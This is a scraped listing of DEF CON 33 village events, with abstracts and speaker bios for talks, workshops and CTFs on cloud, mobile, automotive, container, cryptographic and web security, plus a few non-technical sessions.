CMD+CTRL is an immersive learning and hacking platform where developers, security professionals, and tech enthusiasts come together to sharpen their skills in web application security. Players compete in a real-world environment, uncovering vulnerabilities and learning security techniques hands-on. With real-time scoring, the experience stays engaging, fostering both collaboration and friendly competition.
At DEF CON 33, we’re debuting our latest Cloud Cyber Range: Forescient—a deep dive into exploiting common Azure misconfigurations. This brand-new challenge will put your cloud security expertise to the test like never before.
Are you ready to hack the cloud?
Computer with internet access.
No pre-qualification. Pre-registration is required for the Cloud Cyber Range competition. Please sign up at defcon33.cmdnctrl.net as spots are limited.
Other cyber ranges will also be available for non-competitive play, no registration required.
- ics Calendar file
Abhinav's artistry comes from the times he used to sneakily paint drawings made by his sister. His hacking career began as a toddler, disassembling his toys but never put them back together. His entrepreneurial roots come from selling snacks at a school fair and making a loss of . Having learned how not to make money, he launched Hackerware.io - a boutique badgelife lab with in-house manufacturing - which has grown over the past nine years into a global presence across 19 countries. He’s often spotted at conferences around the world - hosting hardware villages or pulling off the kind of random shenanigans that earned him the Sin CON Person of the Year 2025 award.
- ics Calendar file
The Code Breaker Challenge is an advanced cryptographic puzzle designed for DEF CON attendees who want to push their problem-solving skills to the limit. Anyone who successfully cracks the code will receive an exclusive invite to a private pool party, where they can celebrate their achievement alongside fellow codebreakers.
How It Fits DEF CON’s Theme: Access Everywhere
Usable: The challenge is designed to be solved with logic, pattern recognition, and cryptographic knowledge—no special equipment or insider access required.
Accessible: Participants from all backgrounds can attempt it, regardless of whether they are seasoned cryptographers or first-time codebreakers.
Private & Secure: The challenge will incorporate modern encryption principles that highlight privacy-preserving technologies, showing the importance of cryptography in maintaining free and open access to information.
Structure The challenge will be a multi-layered puzzle, incorporating historical ciphers, steganography, and modern cryptographic techniques.
Participants will have the entire duration of DEF CON to solve it.
Those who succeed will be given a unique code or token to redeem their invitation to the private pool party.
Code Breakers need to access a computer and internet. Everything else is provided.
No pre-qual
- ics Calendar file
Something isn’t right...
Hackwell Heights Medical Center, a naval hospital, has been thrust into chaos. A highly skilled spy has infiltrated the hospital's cybersecurity defenses, stealing sensitive patient information and threatening the lives of those under its care. As the hospital teeters on the brink of catastrophe, it’s up to you and your team to track down the intruder, uncover their methods, and stop the devastating chain of attacks before it’s too late.
Will you rise to the challenge and secure the future of Hackwell Heights Medical Center, or will the spy vanish with secrets that could endanger countless lives?
Join the Biohacking Village CTF and prove your skills in Code Crimson: A Biohackers Emergency.
- ics Calendar file
Want to give vishing a shot? Step into our soundproof booth, grab a mystery target with its number and three challenge tiers, and see if you can nail easy, medium, and hard objectives - first come, first served!
- ics Calendar file
Take a step away from the village chaos and make art with friends. Journey through the woods, space, and a disco skate rink with Smallstep's trusted opossum, Craig, as you color your way to certificate nirvana.
Speakers:Carl Tashian,Hunter Hawke
- ics Calendar file
Take a step away from the village chaos and make art with friends. Journey through the woods, space, and a disco skate rink with Smallstep's trusted opossum, Craig, as you color your way to certificate nirvana.
Speakers:Carl Tashian,Hunter Hawke
- ics Calendar file
Susan Lerner will provide an overview of the ongoing litigation in New York state court, Common Cause NY v. Kosinski, which challenges the legality of using the ES&S ExpressVote XL all-in-one ballot marking device and tabulator under New York law. The ExpressVote XL records votes in barcodes - unreadable to the naked eye - which, Common Cause NY asserts, violates New York law. NY statute provides that all voters must have the opportunity to verify their votes before they are cast. Notably, the federal Help America Vote Act includes the same provision. Should Common Cause NY prevail in state court, the decision could spark further action. The recording or votes in barcodes or QR has been controversial since its introduction. In 2019, Colorado Secretary of State Jenna Griswald (D) announced an initiative to end encoding votes in barcodes/QR codes in Colorado. In March, Donald Trump issued an executive order that sought to prohibit encoding votes in barcodes/QR codes in federally certified voting machines. This talk will explore the legal arguments at issue in the NY case, that could have repercussions elsewhere.
SpeakerBio: Susan Lerner, Common Cause NYSusan Lerner is executive director of Common Cause New York. Susan joined Common Cause in December 2007. She is responsible for setting priorities, strategy, lobbying, serving as a spokesperson, fund-raising and leading the team for the New York organization. Before joining Common Cause, Susan served from 2003-07 as executive director of the California Clean Money Campaign. As a member of the New York and California bars, she was a litigator for almost 20 years. Susan has a bachelor’s degree in psychology from the University of Chicago and a law degree from the New York University School of Law.
- ics Calendar file
Like any good summer camp, we should take a moment to unwind – a recess, if you will. One that’s filled with friendship (bracelets) and… dragonflies? Stop by to make your own pride flags and other crafty beaded accessories!
- ics Calendar file
Vamos apresentar técnicas forenses de recuperação de dados para dispositivos móveis como ISP CHIPOFF e métodos eletrônicos para acesso aos dados
SpeakerBio: Leandro Morales Perito em computação, Perito DigitalLeandro Morales Baier Stefano é especialista em perícia forense digital com mais de 20 anos de experiência. CEO da STWBrasil, atua em investigação de fraudes e cibersegurança, com colaboração ativa junto a ministérios públicos e delegacias especializadas. É coordenador de laboratório privado de extração de dados móveis e professor na Academia Forense Digital. Possui formação em segurança da informação, administração e diversas pós-graduações em direito e ciências forenses. Certificado por empresas como Cellebrite e Cisco, é membro de associações forenses nacionais e internacionais, com mais de 200 atuações como perito judicial. Também apoia a ONG Marias da Internet no combate a crimes digitais contra mulheres.
- ics Calendar file
This talk unveils how a single OPSEC failure—a threat actor testing keylogging and infostealing malware on his own production system—exposed an cybercrime operation in real time. By intercepting Telegram-based command-and-control (C2) communications, we gained direct access to screenshots and keylogs from the threat actor’s backend infrastructure, uncovering additional campaigns he was actively running. We’ll explore how Telegram bots were used to exfiltrate stolen data, how bot tokens were embedded within malware, and how YARA rules and VirusTotal were leveraged to trace and analyse related samples. This session combines technical insight with strategic takeaways, demonstrating how attackers’ dependence on mainstream platforms like Telegram can be turned against them—and how such real-world discoveries can reshape threat intelligence and bolster defensive strategies.
SpeakerBio: Ben "polygonben" FollandBen Folland is a Security Operations Analyst at Huntress, where he manages hands-on-keyboard intrusions and dismantles active threats daily. Before that, he worked at one of Accenture’s SOCs, defending UK Critical National Infrastructure, gaining deep experience in high-stakes environments. He's all about DFIR, malware analysis, and threat hunting—and has a knack for exposing adversary tradecraft. Ben's spoken at over 10 conferences (including six BSides), taught SOC workshops at universities, is GIAC GCFA certified, and was a finalist for the UKs national cyber team. Whether it's CTFs or live incidents, Ben thrives on the chase and brings a hacker mindset to everything he does.
- ics Calendar file
- ics Calendar file
Modern vehicles have evolved into sophisticated, internet-connected computing platforms with attack surfaces spanning cloud infrastructure, telematics systems, and over-the-air update mechanisms. With the automotive industry generating over $11 billion in cyberattack losses in 2023 alone, security researchers struggle to comprehensively map connected vehicle ecosystems using traditional OSINT methodologies that lack automotive-specific knowledge. This presentation introduces a systematic OSINT methodology designed for automotive threat intelligence, combining conventional reconnaissance techniques with automotive-focused discovery methods to identify exposed automotive APIs, misconfigured cloud infrastructure, vulnerable telematics endpoints, and supply chain weaknesses that standard assessments typically miss. Through live demonstrations using real automotive manufacturer targets, attendees will learn to adapt existing OSINT tools like Shodan, Censys, and certificate transparency logs with automotive-focused data sources to build complete attack surface maps of connected vehicle ecosystems. Participants will gain practical skills for discovering OTA update infrastructure, fleet management systems, and connected vehicle APIs while learning to transform raw reconnaissance data into actionable automotive threat intelligence that can be immediately applied whether entering the automotive security space or expanding traditional pentesting expertise into the rapidly growing connected vehicle market.
SpeakerBio: Reuel MagistradoReuel Magistrado is an Auto Threat Researcher at VicOne, specializing in web application, web services, and mobile application penetration testing for automotive clients. He is also involved in creating CTF challenges for automotive security. With extensive experience conducting manual security assessments that go beyond automated tools, Reuel has authored technical reports and delivered security solutions to various clients in previous roles at NCC Group and iZOOlogic.x000D x000D Reuel holds multiple industry certifications including Burp Suite Certified Practitioner (BSCP), APIsec Certified Practitioner (ACP), Practical Mobile Pentest Associate (PMPA) and several specialized penetration testing certifications from The SecOps Group. He also shared his expertise through technical presentations, including his recent talk at NCC Group Philippines’ “Pwning Hall of Fame,” where he demonstrated a race condition exploit leading to price manipulation.
- ics Calendar file
Containers aren’t tiny fortresses. They’re leaky rowboats unless you know what you’re doing. This hands-on workshop demystifies container security layer by layer, showing how real-world missteps in runtime, image, and host configurations open doors to escapes, persistence, and lateral movement. We’ll dissect how containers actually work, walk through common isolation failures, and demonstrate how attackers exploit weak assumptions. Whether you’re building, securing, or regulating containerized apps, you’ll leave with a threat model, practical tools, and maybe a new trick or two for literally popping out of the box.
SpeakerBio: some-natalieNatalie is a principal solutions engineer at Chainguard serving the public sector market. She spent years designing, building, and leading complex systems in regulated environments at a major systems integrator, but has also taken her career in many other directions - including detours into project management, systems engineering, and teaching.
She’s passionate about diversity in technology and empowering engineers to build better.
- ics Calendar file
IoT environments generate massive, noisy streams of logs and alerts—most of which lack the context needed for meaningful detection or response. This talk introduces a novel, LLM-free approach to large-scale alert contextualization that doesn't rely on writing complex queries or integrating heavy ML models. We’ll demonstrate how lightweight, modular correlation logic can automatically enrich logs, infer context, and group related events across sensors, devices, and cloud services. By leveraging time, topology, and behavioral attributes, this method builds causality sequences that explain what happened, where, and why—without human-crafted rules or expensive AI inference. Attendees will walk away with practical techniques and open-source tools for deploying contextualization pipelines in resource-constrained IoT environments. Whether you're defending smart homes, industrial OT networks, or edge devices, you'll learn how to extract insight from noise—fast.
SpeakerBio: Ezz TahounEzz Tahoun is an award-winning cybersecurity data scientist recognized globally for his innovations in applying AI to security operations. He has presented at multiple DEFCON villages, including Blue Team, Cloud, Industrial Control Systems (ICS), Adversary, Wall of Sheep, Packet Hacking, Telecom, and Creator Stage, as well as BlackHat Sector, MEA, EU, and GISEC. His groundbreaking work earned him accolades from Yale, Princeton, Northwestern, NATO, Microsoft, and Canada's Communications Security Establishment. At 19, Ezz began his PhD in Computer Science at the University of Waterloo, quickly gaining recognition through 20 influential papers and 15 open-source cybersecurity tools. His professional experience includes leading advanced AI-driven projects for Orange CyberDefense, Forescout, RBC, and Huawei Technologies US. Holding certifications such as aCCISO, CISM, CRISC, GCIH, GSEC, CEH, and GCP-Cloud Architect, Ezz previously served as an adjunct professor in cyber defense and warfare.
- ics Calendar file
AWS Security MCP(Model Context Protocol) Server - is a tool I've built that fundamentally changes how security teams interact with their AWS environments. Instead of wrestling with the AWS CLI or sifting through thousands of findings from traditional scanners, you can simply talk to your AWS infrastructure using natural language.
This project connects AI assistants like Claude directly to your AWS account, enabling you to:
github link - https://github.com/groovyBugify/aws-security-mcp
Instantly locate resources by IP, tag, name or any attribute across your entire infrastructure
Generate threat models on-demand for specific services or team resources
Visualize attack paths and potential privilege escalation routes
Perform blast radius analysis to understand the impact of potential compromises
Seamlessly search across GuardDuty, SecurityHub, and IAM Access Analyzer findings
Ask natural questions like "Which EC2 instances have public IPs and excessive IAM permissions?"
We will also be covering how we designed the tool to maintain context and token size limits for any MCP Clients.
During my years leading cloud security and bug bounty hunting, I've repeatedly faced the frustration of piecing together information scattered across multiple AWS services. This tool solves that problem by providing a conversation layer that maintains context across your entire infrastructure.
In this talk, I'll demonstrate real-world scenarios where AWS Security MCP helped identify complex security issues that traditional tools missed. For instance, discovering a privilege escalation path that crossed boundaries between EC2, IAM, and S3 which appeared as low-severity individual findings but created a critical attack path when combined.
I'll show how you can:
Instantly identify which team owns a mysterious IP address appearing in your logs
Visualize the network connectivity between your microservices
Generate security assessments for resources tagged to specific applications
Uncover hidden attack paths by analyzing IAM permission chains
The tool is open-source and available today - you can start using it immediately after the talk to gain deeper insights into your own AWS environments
SpeakerBio: Saransh RanaSenior Security Engineer at CRED, working on solving Infrastructure Security problems!
- ics Calendar file
Copycat is a browser extension-based red team toolkit for simulating web-based identity attacks. This tool simulates ten web-based identity attacks through a single browser extension with minimal permissions, operating primarily through hidden windows that execute attacks without user awareness. With Copycat, red teams can simulate complex attack scenarios including silent Gmail and LinkedIn hijacking, credential theft through login and OTP stealing, login page redirection, autofill extraction from enterprise applications, and multiple OAuth manipulation techniques. Copycat runs entirely in-browser with no special hardware requirements. Red teams can use Copycat to demonstrate attack vectors that bypass EDRs, SASE, and other traditional security controls, as these techniques operate within legitimate authenticated sessions rather than breaking them. The tool is fully modifiable, with each module designed for customization to target different services or authentication flows. Source code and documentation will be available for security researchers to extend and improve the framework. Special mention to Pankaj Sharma, Tejeswara S. Reddy, and Arpit Gupta for their contributions in building this toolkit!
Speakers:Dakshitaa Babu,Shourya Pratap Singh,Albin AntonyDakshitaa is a security researcher and product evangelist at SquareX, where she leads the security research team. A self-taught cybersecurity researcher mentored by offensive security veteran Vivek Ramachandran, she specializes in web attacks — malicious websites, files, scripts, and extensions capable of bypassing traditional security solutions. Her research directly fuels SquareX's product innovation, ensuring it stays ahead of evolving threats. As a product evangelist, she is the principal author of SquareX's technical collateral. She has contributed to bleeding-edge browser security research presented at BSides SF Adversary Village, Recon Village, and the DEF CON main stage. Her work on email security bypasses, breaking secure web gateways, MV3 extension vulnerabilities, browser syncjacking, polymorphic extensions, and browser-native ransomware has been covered by leading media outlets, including Forbes, TechRadar, Mashable, The Register, Bleeping Computer, and CyberNews.
SpeakerBio: Shourya Pratap SinghShourya Pratap Singh is responsible for building SquareX's security-focused extension and conducts research on countering web security risks. As a rising figure in cybersecurity, Shourya has presented his work on global stages including the DEFCON main stage, Recon Village, and Adversary Village, as well as at Black Hat Arsenal EU. He has also delivered several workshops at prestigious events such as the Texas Cyber Summit. Shourya earned his bachelor's degree from IIIT Bhubaneswar and holds a patent. His professional interests focus on strengthening the security of browser extensions and web applications.
SpeakerBio: Albin Antony
- ics Calendar file
There's been remarkably little discussion about how mobile forensic tools fare against adversarially modified environments, particularly in terms of forensic reliability. Tools (and investigators) often assume that target devices function as expected, with minimal scrutiny of whether that assumption holds. Our research demonstrates otherwise - sophisticated anti-forensic techniques placed within Android devices can silently compromise evidence, placing longstanding investigative and extraction methodologies at risk.
Our research addresses a blind spot in Android logical extraction workflows - namely, an assumption that once mobile forensic software overcome the hurdle of device access, the extraction is assumed to follow correctly. While forensics software excel at getting a foot in the door, from our actual tests they offer little against stealthy, second-layer countermeasures that can silently manipulate or destroy data post-access.
Speakers:Weihan Goh,Joseph Lim,Isaac SoonDr Weihan Goh is an Associate Professor at the Singapore Institute of Technology (SIT). His research interests include digital forensics, anti-forensics, security testing, as well as technologies for cybersecurity education such as cyber ranges, CTF / CDX, remote proctoring, and anti-fraud / anti-cheat systems. Beyond teaching and research, Dr Goh participates in capture-the-flag exercises, going by the CTF handler 'icebear'.
SpeakerBio: Joseph Lim, Final-year Information Security Student, Singapore Institute of TechnologyJoseph Lim is an Information Security undergraduate at the Singapore Institute of Technology, with a diploma in Infocomm Security Management from Singapore Polytechnic. With a strong foundation in cybersecurity, he is particularly interested in mobile security and digital forensics. Joseph has also previously presented research on mobile malware at the 14th ACM Conference on Data and Application Security and Privacy (2024).
SpeakerBio: Isaac Soon, Final-year Information Security Student, Singapore Institute of TechnologySoon Leung Isaac is currently pursuing a degree in Information and Communication Technology, specializing in Information Security, at the Singapore Institute of Technology. Previously, he served as a SOC analyst in the Singapore Armed Forces for two years, where he was responsible for safeguarding Singapore's military network. His main areas of research include offensive security and mobile security.
- ics Calendar file
Pseudo-Random Number Generators are often overlooked and core features of our computational experience. From research and processes irrelevant to security (i.e. Monte-Carlo simulations) to essential security functionality like secret generation, random number generation plays a significant part in our ability to utilize the modern internet. In turn, they have a unique history, threat model, and set of applications. We will discuss the history of pseudo-random number generation, the types of random number generators, where they are supposed to be utilized, and how to break them, when relevant. Additionally, we will discuss the future direction of random number generation in light of preparation for the advent of large-scale quantum computing.
SpeakerBio: 1nfocalypse1nfocalypse is a software engineer with an interest in coding theory, cryptography, and numerical analysis. He is currently working on portions of libstdc++-v3 and enjoys implementing/tinkering with cryptographic primitives and standards.
- ics Calendar file
Mobile Device Management (MDM) is designed to harden enterprise devices, but what happens when security testing needs to inspect runtime behavior on these same locked devices? This workshop dives deep into bypassing typical MDM-imposed restrictions to perform dynamic runtime API testing on apps that rely heavily on MDM policies. We’ll dissect real-world use cases where traditional testing tools fail and walk through the Appknox approach for injecting custom instrumentation and intercepting APIs in live environments, without root, jailbreak, or MDM tampering. Attendees will learn practical methods to inspect API calls, simulate dynamic inputs, and reverse-engineer mobile apps at runtime, even when locked inside the MDM “vault."
SpeakerBio: Subho Halder, CEO & Co-Founder at AppknoxSubho Halder is the CEO and Co-founder of Appknox, a leading mobile application security platform trusted by 500+ global enterprises. A security researcher turned product leader, he previously worked with Hewlett-Packard and has been listed in Facebook, Google, and Twitter’s Hall of Fame for responsible vulnerability disclosures. Subho specializes in mobile app security, reverse engineering, and kernel exploitation. He has presented at Black Hat and OWASP amongst other industry leading events. At DEFCON, he’s bringing his deep expertise to explore what it takes to test apps on enterprise-locked devices, without breaking policy.
--
Subho Halder is the Co-founder and CEO of Appknox, where he leads advanced research in mobile application security.
He’s spent over a decade deep in offensive security, with a focus on mobile kernel exploitation, runtime evasion, and real-world bypasses for things like RASP and root detection. Subho has shared his work at top conferences including Black Hat, Nullcon, OWASP Global AppSec, and Syscan, often blending hardcore technical research with practical attack demos.
At Appknox, Subho has helped protect more than 500 enterprise apps by embedding mobile security into CI/CD workflows and using real-device testing over emulators. His work has been instrumental in helping organizations in fintech, retail, and aviation catch what traditional tools miss.
By day, he runs a fast-growing SaaS security company. By night, he’s still reverse engineering mobile stacks and building tools that push the boundaries of what’s possible in appsec.
- ics Calendar file
Orv W6BI will discuss how to create a ham radio IP network with off the shelf hardware and open source software.
Orv W6BI will discuss how to create a ham radio IP network with off the shelf hardware and open source software from AREDN. The AREDN software supports over a hundred different devices from several different vendors. The AREDN software allows advertising services, such as web servers, cameras, VOIP phones, etc.
Usable RF links can be up to 30 miles. For those lacking a line of sight path to an AREDN node, the software supports inter-node network links via the Internet.
AREDN islands can be linked via 'superhodes' to allow access to remote nodes. It can be viewed at https://worldmap.arednmesh.org
SpeakerBio: Orv "W6BI" BeachOrv W6BI is a retired Linux system administrator, an ARRL Santa Barbara Section
Technical Specialist and the AREDN Project Manager.
He was first licensed as WN6WEY in 1967. He's been into digital ham radio all his life, starting with CW. He worked his way up through RTTY, PACTOR, packet radio and PSK31, and started messing around with ham radio networking in 2014. He helped deploy the initial ham radio network nodes and backbone buildout in Ventura County and western Los Angeles County.
He's also active in coordinating the build-out and maintenance of the wider Southern California ham radio network, which now spans from Paso Robles in central Calfornia south to the Mexican border and east to Las Vegas, comprising over 550 nodes, both hilltop and ground-level, including hospitals, PDs and EOCs.
He's given over 80 presentations about ham radio networking using AREDN software over the last ten years and mentored many hams worldwide on ham radio networking. He's active in AREDN groups in Facebook, Slack, Telegram, and Discord, and monitors the forums on the AREDN website.
- ics Calendar file
Current ship simulators are designed to help masters and mates pass their STCW exams. They were never designed for cybersecurity use. So, here is the interesting question that will be considered during the presentation. What is the ideal architecture of a virtual ship environment for cybersecurity education, assessment, and research use? Recent work at UNCW suggests there is a need for a hybrid virtual environment comprised of a full mission (above and below the waterline) ship simulator coupled with sub-system device emulators and specialized software applications. Examples of required device emulators include communication devices, bridge instruments, and industrial controllers. Coupling can be accomplished through logical or physical means. Examples of specialized software applications include network traffic generation, strategically located test access points for staging exploits, cyber data analytics, and trainer control over directed simulations. Cybersecurity use cases are being used to help shape derivative functional requirements. Rather than develop a novel virtual environment from scratch, UNCW has been looking into the feasibility of augmenting an existing, commercially available ship simulator with new functionality such that it is fit for cybersecurity use. Unitest’s, Winterthur X92 marine engine simulator is an ideal candidate that will be briefly demonstrated during the presentation.
Speakers:Jeff Greer,Laavanya RachakondaJeff Greer is an Assistant Professor of Practice in Cybersecurity at the University of North Carolina Wilmington. When not teaching he is reading, writing, and coding. The focus of his applied R&D work is the application of system-of-systems engineering practices to resolve maritime cybersecurity problems. Prior to retiring from corporate life, Jeff was an integral part of an executive team that built a mobile broadband business delivering internet services to ships at sea around the world. Jeff is a member of the USCG Sector 5 Area Maritime Security Council and the FBI Infragard program. Jeff holds an MS Degree in Cybersecurity Technology from the University of Maryland Global Campus.
SpeakerBio: Laavanya Rachakonda, Dr. at University of North Carolina-WilmingtonDr. Laavanya Rachakonda is an Assistant Professor in the Department of Computer Science at the University of North Carolina Wilmington, serving in this role since August 2021. She earned her Ph.D. and M.S. in Computer Science and Engineering under Dr. Saraju P. Mohanty at the University of North Texas, Denton, in 2021, and holds a B.Tech. in Electronics and Communication Engineering from VMTW, JNTUH, India.
As the Founder and Director of the Smart and Intelligent Physical Systems Laboratory (SIPS) at UNCW, Dr. Rachakonda leads a multi-disciplinary team researching cutting-edge applications of Machine Learning, Artificial Intelligence, IoT, and IoMT. Her lab’s focus spans Smart Healthcare, Agriculture, Transportation, and Smart Living, aiming to create sustainable, intelligent systems with robust security and privacy integration. SIPS is dedicated to developing low-power, fully automated systems processed at the edge, supporting stress-free and sustainable living.
- ics Calendar file
AI 🤖 is being discussed in pretty much all presentations out there. So, what is different about this session? This is a completely hands-on workshop where we will explore cutting edge agentic frameworks through the creation of an AI agent designed to hack web applications 🌐. You will learn how to develop a modular AI agent capable of performing reconnaissance, vulnerability scanning, and exploiting a web application. We will cover an overview of current AI techniques applicable to red team operations through live demonstrations and interactive exercises.
🚀 Join Omar Santos at DEF CON's Red Team Village to explore how the fusion of AI and red teaming not only redefines the landscape of cyber offensive operations, but also sets the stage for pioneering defensive countermeasures .
🛡️ This workshop promises to equip you with both the knowledge and practical skills to leverage AI in red team operations.
SpeakerBio: Omar SantosOmar Santos is an active member of the security community, where he leads several industry-wide initiatives and standard bodies. Omar is a Distinguished Engineer at Cisco focusing on artificial intelligence (AI) security, cybersecurity research, incident response, and vulnerability disclosure. He is a board member of the OASIS Open standards organization and the founder of OpenEoX. Omar is the co-chair of the Coalition of Secure AI (CoSAI). Omar's collaborative efforts extend to numerous organizations, including the Forum of Incident Response and Security Teams (FIRST) and the Industry Consortium for Advancement of Security on the Internet (ICASI). Omar is the co-chair of the FIRST PSIRT Special Interest Group (SIG). Omar is the co-founder of the DEF CON Red Team Village and the chair of the Common Security Advisory Framework (CSAF) technical committee.
Omar is the author of over 25 books, 21 video courses, and over 50 academic research papers. Omar is a renowned expert in ethical hacking, vulnerability research, incident response, and AI security. He employs his deep understanding of these disciplines to help organizations stay ahead of emerging threats. His dedication to cybersecurity has made a significant impact on technology standards, businesses, academic institutions, government agencies, and other entities striving to improve their cybersecurity programs. Prior to Cisco, Omar served in the United States Marines focusing on the deployment, testing, and maintenance of Command, Control, Communications, Computer and Intelligence (C4I) systems.
- ics Calendar file
A discussion of FOSS tools that can assist with the avoidance of technology platforms that exist to monitize and exploit their users. Discussion and demos of QubesOS, "de-googled" alternative mobile operating sytems, local archiving tools, RF based communications, ways to reduce your "Digital Exhaust".
SpeakerBio: GiglioGiglio is a cybersecurity professional currently working in the Healthcare space. Giglio's career parallels the rise of the "personal computer" and has watched the computing paradigm oscillate between centralised and decentralised and finally to enshittified.
- ics Calendar file
Esta dinámica colaborativa tipo tabletop permite una experiencia controlada y dirigida a comprender y experimentar el desarrollo de un ciberincidente. Para esto, recreamos un escenario de crisis paso a paso, dando lugar a los equipos a explorar las mejores opciones. Este tipo de ejercicios, cuando se utiliza junto a una metodología, buscan evaluar, identificar áreas de mejora y desarrollar planes de acción para mejorar capacidades de respuesta a incidentes.x000D x000D Para participar no es necesario contar con conocimientos técnicos específicos, se espera que en la audiencia exista diversidad de profesionales con perfiles diversos en materia de ciberseguridad y seguridad de la información.x000D x000D Características: x000D x000D - Desarrollo por eventos: La crisis se desplegará a través de una serie de eventos inesperados y piezas de información fragmentada. Tendrán que recopilar datos, analizar la situación y decidir para luego proceder.x000D x000D - Trabajo en equipo: Los asistentes formarán parte de equipos, replicando la necesidad de colaboración entre diferentes roles y áreas para abordar una situación compleja. La comunicación y la coordinación serán fundamentales.x000D x000D - Decisiones priorizadas: Cada elección tendrá consecuencias directas que podrán cambiar el desenlace de la situación. El objetivo es evitar una catástrofe, tomando decisiones posibles con la información disponible en cada momento.x000D x000D - Aprendizaje práctico: Esta actividad busca generar una experiencia que sirva como base para el aprendizaje. Es una oportunidad para poner a prueba habilidades de resolución de problemas, liderazgo y comprensión en un entorno controlado.x000D x000D Los facilitadores han realizado innumerables ejercicios tabletop (TTX) en los últimos 6 años, en distintos países de Latinoamérica y Estados Unidos. Además, han desarrollado varias investigaciones publicadas en papers académicos, que incluyen una metodología, una plataforma para automatizar las ejecuciones, y un modelo de aplicación de TTXs para madurez de capacidades de IR (ver publicaciones en perfiles de Linkedin). También han dictado talleres de diseño de ejercicios TTX, incluyendo uno para la comunidad de FIRST.org. Adicionalmente, realizaron una actividad similar a la propuesta en la conferencia Ekoparty 2024. Más allá de la dinámica, se busca compartir una combinación de las mejores prácticas del sector y la experiencia en la realización de este tipo de ejercicios.
Speakers:Fede Pacheco,Diego StainoCybersecurity professional with a background in electronic engineering and several industry-recognized certifications. 20+ years of teaching experience at the most prestigious universities in Argentina. 4 published books and +15 peer-reviewed research papers. Has worked in the public and private sectors, including regional roles in global companies.
SpeakerBio: Diego Staino, R&D+i Manager, BASE4 SecurityCybersecurity professional with 14+ years of experience as Security and IT consultant. Certified Incident Handler (ECIH) with a degree in Information Security and Communications. Currently works as R&D+i Manager at BASE4 Security, where he leads the company's research and development initiatives.
- ics Calendar file
A strong security culture can’t be bought — it has to be built. The key lies in making security a natural, painless part of developers’ workflows - and knowing how is the difference between success and failure.
In this exercise, you’ll step into the shoes of a developer, tasked with prioritizing and solving vulnerabilities with the right combination of tools, training, and AI - and finally achieving the elusive culture of security.
SpeakerBio: Vincent Cannone
- ics Calendar file
A strong security culture can’t be bought — it has to be built. The key lies in making security a natural, painless part of developers’ workflows - and knowing how is the difference between success and failure.
In this exercise, you’ll step into the shoes of a developer, tasked with prioritizing and solving vulnerabilities with the right combination of tools, training, and AI - and finally achieving the elusive culture of security.
SpeakerBio: Vincent Cannone
- ics Calendar file
Buildings are largely overlooked when it comes to cyber security. The onus is typically placed on physically securing the building and the people inside of them. What most gloss over is the fact that industrial control systems run these buildings and without them, every day functions become unavailable and downright dangerous. The dangers are growing as buildings become more "connected" and require internet access to operate (ex. sustainability and IoT). Malicious use of engineering protocols (Modbus, Fox, BACNet) and targeted attacks against BAS systems are growing (ex. KNXLock).”
Environments run the gamut from overly secure, to the point of crippling, all the way to leaving RDP exposed with no logging or MFA to critical systems. There is no easy fix, properties must invest in technology and people to create a defensible environment. This presentation will show how cyber security can be enabled which fits with the business's operations and minimal disruption.
Building types are not constrained to only office space. Properties come in all varieties from warehouses and manufacturing spaces to data centers and shopping malls. All of this needs to be taken into account when assessing the environment and recommending tools and procedures. This talk will cover common architectures seen, typical control systems found in buildings (BMS, FLS, elevator, lighting, power...), reproducible steps to help companies/users understand their vulnerabilities and how we, as an industry, move forward.
For the most part, these are not technical problems, but a literal gap that needs to be addressed directly by budgetary and policy controls. The industry is pushing for cybersecurity budgeting, standards and visibility for properties, which are largely ignored or misunderstood by owners and operators. This is a solvable problem and I want attendees to feel empowered to ask tough questions and be prepared to have an educated conversation about the risks and not use fear mongering or scare tactics to get cybersecurity put in place.
SpeakerBio: Thomas Pope, JILThomas Pope is the Head of Property Cybersecurity at Jones Lang Lasalle (JLL). His team assists customers and internal teams with securing control systems at their properties and how to accomplish cybersecurity at scale with regards to building operations. Previous stints including leading incident response engagements at Cisco Talos as an Incident Commander, Adversary Hunter at Dragos; searching for ICS-specific adversaries and standing up multiple cybersecurity programs at Duke Energy.
- ics Calendar file
Cross-Site WebSocket Hijacking (CSWSH) is a powerful yet underexplored vulnerability in modern web applications. This talk looks at how advancements in browser security, such as SameSite cookie defaults, Total Cookie Protection, and Private Network Access, have reshaped its exploitability. Through real-world case studies from past security assessments, we'll examine scenarios where CSWSH attacks succeeded, but would now be mitigated by contemporary browser features. Attendees will gain insights into the prerequisites for successful CSWSH exploitation, understand the implications of browser security enhancements, and learn best practices for securing WebSocket implementations against such attacks.
SpeakerBio: hyperrealityLaurence is an application security consultant at Include Security with a broad range of interests. He is the co-founder of CryptoHack, a popular cryptography challenge platform. He got addicted to CTFs at university and has been learning as much as he can about web, cryptography, network, and infrastructure security since then. In his spare time he loves going on cycling and hiking trips.
- ics Calendar file
- ics Calendar file
- ics Calendar file
Cryptocurrency nodes validate and relay transactions across the network. Like servers in a traditional financial system, nodes store a copy of the blockchain and enforce the network's rules. Many of us want to run their own node for reasons of security, convenience, and independence of other people's node configurations. Come to understand nodes, build your own, and explore configurations to test wallet applications on your new cryptocurrency node.
Speakers:Diego "rehrar" Salazar,DanDiego 'rehrar' Salazar has been around the FOSS and cryptocurrency communities for eight years. He owns and runs Cypher Stack, a company that performs novel research and makes contributions to various FOSS projects. He has organized and managed several villages at defcon, c3, and more.
SpeakerBio: Dan
- ics Calendar file
In 2022 a framework and tool for cryptographic attacks called Cryptosploit was introduced. In this workshop we will demo the capabilities and the underlying philosophy as well as new commands. This will include the flexibility of mixing and matching attack code with oracles and new commands to import and export cryptographic keys. In particular, we will demonstrate how after a successful attack on a public key, we will be able to export the private key corresponding to the certificate. The presentation will conclude with thoughts on improvements.
SpeakerBio: Matt CheungMatt Cheung started developing his interest in cryptography during an internship in 2011. He worked on implementation of a secure multi-party protocol by adding elliptic curve support to an existing secure text pattern matching protocol. Implementation weaknesses were not a priority and this concerned Matt. This concern prompted him to learn about cryptographic attacks from Dan Boneh's crypto 1 course offered on Coursera and the Matasano/cryptopals challenges. From this experience he has given workshops at the Boston Application Security Conference, BSidesLV, DEF CON, and the Crypto and Privacy VillageHe now serves on the programming committee of the Crypto and Privacy Village. He now serves on the programming committee of the Crypto and Privacy Village.
- ics Calendar file
In 2022 a framework and tool for cryptographic attacks called Cryptosploit was introduced. In this workshop we will demo the capabilities and the underlying philosophy as well as new commands. This will include the flexibility of mixing and matching attack code with oracles and new commands to import and export cryptographic keys. In particular, we will demonstrate how after a successful attack on a public key, we will be able to export the private key corresponding to the certificate. The presentation will conclude with thoughts on improvements.
